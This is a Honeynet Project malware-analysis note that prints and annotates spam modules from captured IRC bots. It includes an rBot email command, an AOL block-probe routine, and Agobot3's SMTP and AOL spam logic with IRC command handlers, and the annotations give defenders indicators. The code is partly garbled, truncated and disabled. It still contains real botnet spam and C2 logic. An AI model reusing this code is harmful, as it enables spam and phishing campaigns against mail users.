Honeynet Project
http://www.honeynet.org
Last Modified: 14th May 2005
In this side note we will review the source code of some bots captured during our research and show several examples of how bots are being used to send out spam and phishing emails.
[...] else if (strcmp("email", a[s]) == 0 ) { WORD version = MAKEWORD(1,1); WSADATA wsaData; char server[256], sender_email[256], recp_email[256], subject[256], myBuf[256], BigBuf[1024]; int port, nRet; strcpy(server,a[s+1]); port = atoi(a[s+2]); strcpy(sender_email,a[s+3]); strcpy(recp_email,a[s+4]); strcpy(subject,replacestr(a[s+5],"_"," ")); fWSAStartup(version, &wsaData); LPHOSTENT lpHostEntry; lpHostEntry = fgethostbyname(server); SOCKET MailSocket; MailSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP); SOCKADDR_IN saServer; saServer.sin_family = AF_INET; saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); saServer.sin_port = fhtons((unsigned short)port); sprintf(BigBuf,"helo $rndnick\nmail from: <%s>\nrcpt to: <%s>\ndata\nsubject: %s\nfrom: %s\n%s\n.\n",sender_email,recp_email,subject,sender_email,subject); nRet = fconnect(MailSocket, (LPSOCKADDR)&saServer, sizeof(saServer)); nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0); nRet = fsend(MailSocket, BigBuf, strlen(myBuf), 0); nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0); fclosesocket(MailSocket); fWSACleanup(); sprintf(sendbuf, "[EMAIL]: Message sent to %s.",recp_email); if (!silent) irc_privmsg(sock, a[2], sendbuf, notice); addlog(sendbuf); return repeat; } [...]
/*
 * CanSpamAOL() -- from a captured bot (Honeynet excerpt), annotated for analysis.
 *
 * Purpose: connects on TCP/25 to one of four hard-coded AOL inbound mail
 * exchangers and scores the SMTP greeting against fragments of AOL's
 * dynamic/residential block notice (iIsMsg_Matched, expressed in percent).
 * Only greeting lines received before the normal "220-... ESMTP" banner are
 * scored.
 *
 * Returns: true  when the connection succeeded and the score is <= 5
 *                (the bot treats this as "AOL will accept mail from here");
 *          false when DoTcpConnect() fails or the greeting looks like a block.
 *
 * Defender notes: a host that is not a mail server opening outbound port 25
 * to mailin-0[1-4].mx.aol.com, reading only the banner and sending QUIT is a
 * recognisable pre-spam probe, and is one reason outbound 25 is commonly
 * filtered on residential ranges. brandom(), DoTcpConnect(), recv_line(),
 * xWrite() and xClose() are bot-internal helpers not shown in this excerpt.
 */
bool CanSpamAOL()
{
    int iRnd=brandom(1, 4);          // picks one of the four MX hosts at random
    char *szDNS;
    int iIsMsg_Matched=0;
    // How much the AOL blocking message has been matched in %
    // 25% are for occurence of string "postmaster.info.aol.com"
    // 20% are for an immediate 554
    // 10% are for a line count of 5
    // 10% are for occurence of string "(RTR:DU)"
    // 10% are for occurence of string "not accept"
    // 5% are for occurence of string "dynamic" (occurs 2 times)
    // 5% are for occurence of string "residential" (occurs 2 times)
    // 5% are for occurence of string "are using to"
    switch(iRnd)
    {
    case 1: szDNS="mailin-01.mx.aol.com"; break;
    case 2: szDNS="mailin-02.mx.aol.com"; break;
    case 3: szDNS="mailin-03.mx.aol.com"; break;
    case 4: szDNS="mailin-04.mx.aol.com"; break;
    default:
#ifdef DBGCONSOLE
        g_cMainCtrl.m_cConsDbg.Log(9, "CanSpamAOL(): Unknown value %d in switch statement.\n", iRnd);
#endif
        break;                       // szDNS stays unset on this path
    }
    int sAOLSock=DoTcpConnect(szDNS, 25);
    if(sAOLSock==SOCKET_ERROR) return false;
    int iCount=0;
    char szBuf[4096];
    // Read the greeting line by line; stop at the normal ESMTP banner,
    // otherwise add the weight of every block-notice fragment found.
    while(recv_line(sAOLSock, szBuf, sizeof(szBuf)))
    {
        if(strstr(szBuf, "220-") && strstr(szBuf, "ESMTP")) break;
        if(strstr(szBuf, "postmaster.info.aol.com")) iIsMsg_Matched+=25;
        if(strstr(szBuf, "554-") && iCount==1) iIsMsg_Matched+=20;   // 554 counts only on the second line
        if(strstr(szBuf, "(RTR:DU)")) iIsMsg_Matched+=10;
        if(strstr(szBuf, "not accept")) iIsMsg_Matched+=10;
        if(strstr(szBuf, "dynamic")) iIsMsg_Matched+=5;
        if(strstr(szBuf, "residential")) iIsMsg_Matched+=5;
        if(strstr(szBuf, "are using to")) iIsMsg_Matched+=5;
        iCount++;
    }
    if(iCount==5) iIsMsg_Matched+=10;   // the block notice is expected to be five lines long
    // sizeof("QUIT\n") is 6, so the terminating NUL goes on the wire after the
    // newline -- a small protocol quirk a network signature can key on.
    xWrite(sAOLSock, "QUIT\n", sizeof("QUIT\n"));
    bool bRetVal=false;
    if(iIsMsg_Matched <= 5) bRetVal=true;
    xClose(sAOLSock);
    return bRetVal;
}
/* Agobot3 - a modular IRC bot for Win32 / Linux Copyright (c) 2003 Ago All rights reserved. This is private software, you may redistribute it under the terms of the APL(Ago's Private License) which follows: Redistribution and use in binary forms, with or without modification, are permitted provided that the following conditions are met: 1. The name of the author may not be used to endorse or promote products derived from this software without specific prior written permission. 2. The binary may not be sold and/or given away for free. 3. The licensee may only create binaries for his own usage, not for any third parties. Redistribution and use in source forms, with or without modification, are not permitted. THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/
// Analysis annotation (Honeynet): below is the SMTP spam module (CSMTP_Logic)
// of the captured Agobot3 source, followed by its AOL-webmail twin
// (CAOL_Logic). Both register IRC commands that fetch an address list and a
// message template over HTTP, stage them as "list.tmp" / "template.tmp" in
// the bot's working directory, parse them into members, and delete the files
// again. The command names, CVAR names and those two temp-file names are the
// most useful host/IRC indicators in this excerpt. Several passages were
// garbled when the page was extracted; they are marked inline and left as
// they appear rather than reconstructed. The helper types (CString,
// CDownloadHelper, CMessage, url, REGCMD/REGCVAR) are bot-internal and not
// shown; GetFileSize() here takes a FILE* and so is evidently a bot helper,
// not the Win32 API of the same name.
#include "main.h"
#include "mainctrl.h"
#include "smtp_logic.h"
#include "smtp.h"

// Constructor: tags the module for the bot's logic registry and clears all
// spam state (no list, no template, not spamming).
CSMTP_Logic::CSMTP_Logic()
{
    m_szType="CSMTP_Logic";
    m_lEmails.clear();
    m_sEmailTemplate.Assign("");
    m_bSpamming=false;
    m_bTemplateSet=false;
}

// Destructor: performs the same reset as the constructor.
CSMTP_Logic::~CSMTP_Logic()
{
    m_lEmails.clear();
    m_sEmailTemplate.Assign("");
    m_bSpamming=false;
    m_bTemplateSet=false;
}

// Registers the module's IRC command surface and its two configuration
// variables. The four "spam.*" command strings are a direct C2 signature;
// spam_maxthreads defaults to "8", spam_htmlemail to "true".
void CSMTP_Logic::Init()
{
    REGCMD(m_cmdSetList, "spam.setlist", "downloads an email list", false, this);
    REGCMD(m_cmdSetTemplate, "spam.settemplate", "downloads an email template", false, this);
    REGCMD(m_cmdStart, "spam.start", "starts the spamming", false, this);
    REGCMD(m_cmdStop, "spam.stop", "stops the spamming", false, this);
    REGCVAR(spam_maxthreads, "8", "Spam Logic - Number of threads", false, 0);
    REGCVAR(spam_htmlemail, "true", "Spam Logic - Send HTML emails", false, 0);
}

// Dispatches one IRC message to the module. The first space-separated
// argument of the chat line is taken as the list/template URL. Returns true
// when the command was one of this module's, false otherwise.
// (CString::Compare() is only ever used as "!Compare(...)", so it apparently
// returns 0 on a match -- its definition is not in this excerpt.)
bool CSMTP_Logic::HandleCommand(CMessage *pMsg)
{
    if(!pMsg->sCmd.Compare("spam.setlist"))
    {
        m_sListURL.Assign(pMsg->sChatString.Token(1, " "));
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Downloading new email list.", pMsg->sReplyTo.Str());
        SetList(m_sListURL);
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Finished downloading new email list.", pMsg->sReplyTo.Str());
        return true;
    }
    else if(!pMsg->sCmd.Compare("spam.settemplate"))
    {
        m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " "));
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Downloading new email template.", pMsg->sReplyTo.Str());
        SetTemplate(m_sTemplateURL);
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Finished downloading new email template.", pMsg->sReplyTo.Str());
        return true;
    }
    else if(!pMsg->sCmd.Compare("spam.start"))
    {
        m_bSpamming=true;   // only a flag; the sender loop in Run() reads it
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Started spamming.", pMsg->sReplyTo.Str());
        return true;
    }
    else if(!pMsg->sCmd.Compare("spam.stop"))
    {
        m_bSpamming=false;
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Stopped spamming.", pMsg->sReplyTo.Str());
        return true;
    }
    return false;
}

// Fetches the recipient list from sURL (through the bot's download helper,
// with IRC progress messages suppressed) into "list.tmp", reads the whole
// file, splits it on CR/LF, appends every non-empty line to m_lEmails, and
// deletes the file. Any failure is swallowed by the catch-all at the end, so
// the caller cannot tell whether a list was actually loaded.
// Host artefact: "list.tmp" briefly exists in the bot's working directory.
void CSMTP_Logic::SetList(CString &sURL)
{
    try
    {
        url uURL;
        CDownloadHelper *pDldHlp=new CDownloadHelper;
        if(!ParseURL(sURL, &uURL)) return;
        pDldHlp->m_sHost.Assign(uURL.sHost);
        pDldHlp->m_sPath.Assign(uURL.sReq);
        pDldHlp->m_sTarget.Assign("list.tmp");
        pDldHlp->m_sReplyTo.Assign("");
        pDldHlp->m_bExecute=false;
        pDldHlp->m_bUpdate=false;
        pDldHlp->m_bFTP=false;
        pDldHlp->m_bSilent=true;     // no IRC chatter for this download
        pDldHlp->m_bNotice=false;
        pDldHlp->m_bJoin=false;
        pDldHlp->Run();
        delete pDldHlp;
        FILE *fp=fopen("list.tmp", "rb");
        if(!fp) return;
        int iFileSize=GetFileSize(fp);
        char *szList=new char[iFileSize+1];
        memset(szList, 0, iFileSize+1);
        fread(szList, sizeof(char), iFileSize, fp);
        CString sList(szList);
        char *szListCopy=sList.Str(), *szTemp;   // szTemp is never used
        // Tokenise in place: each run of CR/LF is overwritten with NULs and the
        // text before it becomes one address. A final line without a line
        // ending is never pushed, because the loop breaks before reaching it.
        while(true)
        {
            char *szCRLF=strstr(szListCopy, "\r");
            if(!szCRLF) szCRLF=strstr(szListCopy, "\n");
            if(!szCRLF) break;
            while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
            while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; }
            while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
            char *szToken=szListCopy;
            szListCopy=szCRLF;
            if(!strcmp(szToken, "")) continue;
            m_lEmails.push_back(CString(szToken));
        }
        delete [] szList;
        fclose(fp);
        DeleteFile("list.tmp");
#ifdef PtW32CatchAll
    } PtW32CatchAll {
#else
    } catch(...) {
#endif
        // Bla
    }
}

// Fetches the message template from sURL into "template.tmp" and parses it.
// Header section: lines are read until one beginning with "data"; a line
// whose first word is "from", "from_full" or "subject" sets m_sEmailSrc,
// m_sEmailSrcFull or m_sSubject from the rest of the line. Body section: all
// remaining lines are re-joined with CRLF into m_sData. Finally
// m_bTemplateSet is raised, which is one of the two conditions Run()'s
// sender loop checks. The CR/LF stripping relies on CString::Find() and
// operator[] semantics not shown here. Host artefact: "template.tmp".
void CSMTP_Logic::SetTemplate(CString &sURL)
{
    try
    {
        url uURL;
        CDownloadHelper *pDldHlp=new CDownloadHelper;
        if(!ParseURL(sURL, &uURL)) return;
        pDldHlp->m_sHost.Assign(uURL.sHost);
        pDldHlp->m_sPath.Assign(uURL.sReq);
        pDldHlp->m_sTarget.Assign("template.tmp");
        pDldHlp->m_sReplyTo.Assign("");
        pDldHlp->m_bExecute=false;
        pDldHlp->m_bUpdate=false;
        pDldHlp->m_bFTP=false;
        pDldHlp->m_bSilent=true;
        pDldHlp->m_bNotice=false;
        pDldHlp->m_bJoin=false;
        pDldHlp->Run();
        delete pDldHlp;
        FILE *fp=fopen("template.tmp", "rb");
        if(!fp) return;
        int iFileSize=GetFileSize(fp);
        char *szTemplate=new char[iFileSize+1];
        memset(szTemplate, 0, iFileSize+1);
        // Header lines, up to the "data" marker.
        while(!feof(fp))
        {
            fgets(szTemplate, iFileSize, fp);
            CString sTemplate(szTemplate);
            if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; }
            if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; }
            if(!sTemplate.Mid(0, 4).Compare("data")) break;
            if(!sTemplate.Token(0, " ").Compare("from")) { m_sEmailSrc.Assign(sTemplate.Token(1, " ", true)); }
            if(!sTemplate.Token(0, " ").Compare("from_full")) { m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true)); }
            if(!sTemplate.Token(0, " ").Compare("subject")) { m_sSubject.Assign(sTemplate.Token(1, " ", true)); }
        }
        // Body lines, re-joined with CRLF (the fgets buffer is reused).
        CString sDataTmp("");
        while(!feof(fp))
        {
            fgets(szTemplate, iFileSize, fp);
            CString sTemplate(szTemplate);
            if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; }
            if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; }
            sDataTmp.Append(sTemplate);
            sDataTmp.Append("\r\n");
        }
        m_sData.Assign(sDataTmp);
        m_sEmailTemplate.Assign("");
        delete [] szTemplate;
        fclose(fp);
        DeleteFile("template.tmp");
        m_bTemplateSet=true;
#ifdef PtW32CatchAll
    } PtW32CatchAll {
#else
    } catch(...) {
#endif
        // Bla
    }
}

// Worker-thread body. Its first statement is "return NULL;", so in this build
// the sender loop below is dead code: the module accepts its IRC commands but
// never sends. The excerpt is garbled from the for-loop condition onward --
// the text up to the middle of CAOL_Logic::HandleCommand() was lost, apparently
// to an unescaped '<' in the original HTML -- and is kept as it appears.
void *CSMTP_Logic::Run()
{
    return NULL;
    while(true)
    {
        try
        {
            int iNumThreads=spam_maxthreads.iValue;
            CSMTP_Sender *pSenders=new CSMTP_Sender[iNumThreads];
            // Spam loop
            while(m_bSpamming && m_bTemplateSet)
            {
                // Loop through all available threads
                for(int i=0; isCmd.Compare("aolspam.setlist"))
// [garbled excerpt: from here on the text belongs to
//  CAOL_Logic::HandleCommand(CMessage *pMsg), whose opening -- together with
//  the rest of CSMTP_Logic::Run() and the CAOL_Logic constructor, destructor
//  and Init() -- is missing from the page. The "aolspam.*" command strings
//  are this module's C2 signature.]
    {
        m_sListURL.Assign(pMsg->sChatString.Token(1, " "));
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Downloading new email list.", pMsg->sReplyTo.Str());
        SetList(m_sListURL);
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Finished downloading new email list.", pMsg->sReplyTo.Str());
        return true;
    }
    else if(!pMsg->sCmd.Compare("aolspam.settemplate"))
    {
        m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " "));
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Downloading new email template.", pMsg->sReplyTo.Str());
        SetTemplate(m_sTemplateURL);
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Finished downloading new email template.", pMsg->sReplyTo.Str());
        return true;
    }
    // Credentials for the AOL account the messages are sent through
    // (presumably consumed by CAOLWebMail, which is not shown). Note the plain
    // "if": this starts a second, independent dispatch chain.
    if(!pMsg->sCmd.Compare("aolspam.setuser"))
    {
        SetUser(pMsg->sChatString.Token(1, " "));
        return true;
    }
    else if(!pMsg->sCmd.Compare("aolspam.setpass"))
    {
        SetPassword(pMsg->sChatString.Token(1, " "));
        return true;
    }
    else if(!pMsg->sCmd.Compare("aolspam.start"))
    {
        m_bSpamming=true;
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Started spamming.", pMsg->sReplyTo.Str());
        return true;
    }
    else if(!pMsg->sCmd.Compare("aolspam.stop"))
    {
        m_bSpamming=false;
        g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
            "Stopped spamming.", pMsg->sReplyTo.Str());
        return true;
    }
    return false;
}

// Identical to CSMTP_Logic::SetList() above: downloads the recipient list to
// "list.tmp", splits it on CR/LF into m_lEmails, deletes the file, and
// swallows every error.
void CAOL_Logic::SetList(CString &sURL)
{
    try
    {
        url uURL;
        CDownloadHelper *pDldHlp=new CDownloadHelper;
        if(!ParseURL(sURL, &uURL)) return;
        pDldHlp->m_sHost.Assign(uURL.sHost);
        pDldHlp->m_sPath.Assign(uURL.sReq);
        pDldHlp->m_sTarget.Assign("list.tmp");
        pDldHlp->m_sReplyTo.Assign("");
        pDldHlp->m_bExecute=false;
        pDldHlp->m_bUpdate=false;
        pDldHlp->m_bFTP=false;
        pDldHlp->m_bSilent=true;
        pDldHlp->m_bNotice=false;
        pDldHlp->m_bJoin=false;
        pDldHlp->Run();
        delete pDldHlp;
        FILE *fp=fopen("list.tmp", "rb");
        if(!fp) return;
        int iFileSize=GetFileSize(fp);
        char *szList=new char[iFileSize+1];
        memset(szList, 0, iFileSize+1);
        fread(szList, sizeof(char), iFileSize, fp);
        CString sList(szList);
        char *szListCopy=sList.Str(), *szTemp;   // szTemp is never used
        while(true)
        {
            char *szCRLF=strstr(szListCopy, "\r");
            if(!szCRLF) szCRLF=strstr(szListCopy, "\n");
            if(!szCRLF) break;
            while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
            while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; }
            while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
            char *szToken=szListCopy;
            szListCopy=szCRLF;
            if(!strcmp(szToken, "")) continue;
            m_lEmails.push_back(CString(szToken));
        }
        delete [] szList;
        fclose(fp);
        DeleteFile("list.tmp");
#ifdef PtW32CatchAll
    } PtW32CatchAll {
#else
    } catch(...) {
#endif
        // Bla
    }
}

// Identical to CSMTP_Logic::SetTemplate() above: downloads the template to
// "template.tmp", parses the from / from_full / subject header lines up to
// the "data" marker, joins the rest into m_sData, deletes the file and raises
// m_bTemplateSet.
void CAOL_Logic::SetTemplate(CString &sURL)
{
    try
    {
        url uURL;
        CDownloadHelper *pDldHlp=new CDownloadHelper;
        if(!ParseURL(sURL, &uURL)) return;
        pDldHlp->m_sHost.Assign(uURL.sHost);
        pDldHlp->m_sPath.Assign(uURL.sReq);
        pDldHlp->m_sTarget.Assign("template.tmp");
        pDldHlp->m_sReplyTo.Assign("");
        pDldHlp->m_bExecute=false;
        pDldHlp->m_bUpdate=false;
        pDldHlp->m_bFTP=false;
        pDldHlp->m_bSilent=true;
        pDldHlp->m_bNotice=false;
        pDldHlp->m_bJoin=false;
        pDldHlp->Run();
        delete pDldHlp;
        FILE *fp=fopen("template.tmp", "rb");
        if(!fp) return;
        int iFileSize=GetFileSize(fp);
        char *szTemplate=new char[iFileSize+1];
        memset(szTemplate, 0, iFileSize+1);
        // Header lines, up to the "data" marker.
        while(!feof(fp))
        {
            fgets(szTemplate, iFileSize, fp);
            CString sTemplate(szTemplate);
            if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; }
            if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; }
            if(!sTemplate.Mid(0, 4).Compare("data")) break;
            if(!sTemplate.Token(0, " ").Compare("from")) { m_sEmailSrc.Assign(sTemplate.Token(1, " ", true)); }
            if(!sTemplate.Token(0, " ").Compare("from_full")) { m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true)); }
            if(!sTemplate.Token(0, " ").Compare("subject")) { m_sSubject.Assign(sTemplate.Token(1, " ", true)); }
        }
        // Body lines, re-joined with CRLF.
        CString sDataTmp("");
        while(!feof(fp))
        {
            fgets(szTemplate, iFileSize, fp);
            CString sTemplate(szTemplate);
            if(sTemplate.Find('\r', 0)) { sTemplate[sTemplate.Find('\r', 0)-1]='\0'; }
            if(sTemplate.Find('\n', 0)) { sTemplate[sTemplate.Find('\n', 0)-1]='\0'; }
            sDataTmp.Append(sTemplate);
            sDataTmp.Append("\r\n");
        }
        m_sData.Assign(sDataTmp);
        m_sEmailTemplate.Assign("");
        delete [] szTemplate;
        fclose(fp);
        DeleteFile("template.tmp");
        m_bTemplateSet=true;
#ifdef PtW32CatchAll
    } PtW32CatchAll {
#else
    } catch(...) {
#endif
        // Bla
    }
}

// Stores the AOL account name supplied via "aolspam.setuser".
void CAOL_Logic::SetUser(CString &sUser)
{
    m_sUser.Assign(sUser);
}

// Stores the AOL account password supplied via "aolspam.setpass" (kept in
// memory as plain text in m_sPass).
void CAOL_Logic::SetPassword(CString &sPass)
{
    m_sPass.Assign(sPass);
}

// Worker-thread body for the AOL variant; like CSMTP_Logic::Run() it begins
// with "return NULL;", so the loop is unreachable in this build. The page's
// excerpt ends mid-statement here.
void *CAOL_Logic::Run()
{
    return NULL;
    while(true)
    {
        try
        {
            int iNumThreads=aolspam_maxthreads.iValue;
            CAOLWebMail *pSenders=new CAOLWebMail[iNumThreads];
            // Spam loop
            while(m_bSpamming && m_bTemplateSet)
            {
                // Loop through all available threads
                for(int i=0; i
// [excerpt truncated here by the page]